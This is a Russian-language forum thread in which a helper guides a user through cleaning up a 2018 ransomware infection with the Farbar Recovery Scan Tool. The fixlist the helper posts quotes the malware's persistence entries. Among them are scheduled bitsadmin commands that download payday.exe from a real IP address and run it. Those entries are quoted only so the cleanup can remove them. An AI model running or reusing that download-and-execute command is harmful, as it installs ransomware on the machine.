bartleby 0 Опубликовано 20 июня, 2018 Share Опубликовано 20 июня, 2018 (изменено) Добрый день Поймали шифровальщика Шифрование началось ночью примерно в 3 часа и к утру большая часть файлов была зашифрована Примеры зашифрованных файлов, файлов readme.txt и логи прилагаю Спасибо FRST.txt Addition.txt Shortcut.txt files.zip README.zip CollectionLog-2018.06.20-13.07.zip Изменено 20 июня, 2018 пользователем bartleby Цитата Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 20 июня, 2018 Share Опубликовано 20 июня, 2018 Порядок оформления запроса о помощи Цитата Ссылка на сообщение Поделиться на другие сайты
bartleby 0 Опубликовано 20 июня, 2018 Автор Share Опубликовано 20 июня, 2018 Прикрепил лог к исходному сообщению Цитата Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 20 июня, 2018 Share Опубликовано 20 июня, 2018 C:\payday.exe или C:\7061996461992E657865 есть на компьютере? Цитата Ссылка на сообщение Поделиться на другие сайты
bartleby 0 Опубликовано 20 июня, 2018 Автор Share Опубликовано 20 июня, 2018 Нет таких Цитата Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 20 июня, 2018 Share Опубликовано 20 июня, 2018 Печально. Это похоже и есть шифратор. Его нет даже на исходном сервере. Пробуйте с помощью программ восстановления данных, которые нужно установить на несистемный диск, поискать файл среди удаленных. Такой файл C:\Users\Администратор\AppData\Local\Temp\{3BD59D8C-6E70-4C17-ACB8-F8B333A1F93E}.cmd тоже отсутствует? + 1. Откройте Блокнот и скопируйте в него приведенный ниже текст CreateRestorePoint: HKLM-x32\...\RunOnce: [{3BD59D8C-6E70-4C17-ACB8-F8B333A1F93E}] => cmd.exe /C start /D "C:\Users\A5A32~1.PEK\AppData\Local\Temp" /B {3BD59D8C-6E70-4C17-ACB8-F8B333A1F93E}.cmd Handler: ms-help - {314111c7-a502-11d2-bbca-00c04f8ec294} - No File S2 BvWn; cmd /c bitsadmin /transfer wcb /priority high http://81.177.140.58/payday.exe C:\payday.exe && C:\payday.exe S2 eINJ; cmd /c bitsadmin /transfer wcb /priority high http://81.177.140.58/payday.exe C:\payday.exe && C:\payday.exe <==== ATTENTION S2 WbZa; cmd /c bitsadmin /transfer wcb /priority high http://81.177.140.58/payday.exe C:\payday.exe && C:\payday.exe S2 Googler; C:\Windows\System32\nssm.exe [121344 2017-11-15] () [File not signed] C:\Windows\System32\nssm.exe 2. Нажмите Файл – Сохранить как3. Выберите папку, откуда была запущена утилита Farbar Recovery Scan Tool 4. Укажите Тип файла – Все файлы (*.*) 5. Введите имя файла fixlist.txt и нажмите кнопку Сохранить 6. Запустите FRST, нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении. Обратите внимание: перезагрузку компьютера нужно выполнить вручную. Цитата Ссылка на сообщение Поделиться на другие сайты
bartleby 0 Опубликовано 20 июня, 2018 Автор Share Опубликовано 20 июня, 2018 Такой файл C:\Users\Администратор\AppData\Local\Temp\{3BD59D8C-6E70-4C17-ACB8-F8B333A1F93E}.cmd тоже отсутствует? Конкретно такого нету.. есть папка похожего вида но другое имя и пустая. Цитата Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 20 июня, 2018 Share Опубликовано 20 июня, 2018 Пробуйте выполнять поиск payday.exe и 7061796461992E657865 среди удаленных А потом фикс в Farbar Цитата Ссылка на сообщение Поделиться на другие сайты
bartleby 0 Опубликовано 20 июня, 2018 Автор Share Опубликовано 20 июня, 2018 Система была проверена KVRT лог приложить не дает На скрине то что он нашел Пробуйте выполнять поиск payday.exe и 7061796461992E657865 среди удаленных А потом фикс в Farbar Сканирую систему по результату отпишусь Цитата Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 20 июня, 2018 Share Опубликовано 20 июня, 2018 Последний файл выложите в архиве с паролем virus на sendspace.com и пришлите ссылку мне в ЛС Цитата Ссылка на сообщение Поделиться на другие сайты
bartleby 0 Опубликовано 20 июня, 2018 Автор Share Опубликовано 20 июня, 2018 отправил в ЛС Цитата Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 20 июня, 2018 Share Опубликовано 20 июня, 2018 В скрипт в сообщении №6 внесены изменения. Выполните его. Цитата Ссылка на сообщение Поделиться на другие сайты
bartleby 0 Опубликовано 20 июня, 2018 Автор Share Опубликовано 20 июня, 2018 лог загрузил перегружать машину надо? Fixlog.txt Цитата Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 20 июня, 2018 Share Опубликовано 20 июня, 2018 Да, конечно Цитата Ссылка на сообщение Поделиться на другие сайты
bartleby 0 Опубликовано 20 июня, 2018 Автор Share Опубликовано 20 июня, 2018 Готово. Лог в 13 сообщении. машину перегрузил Цитата Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.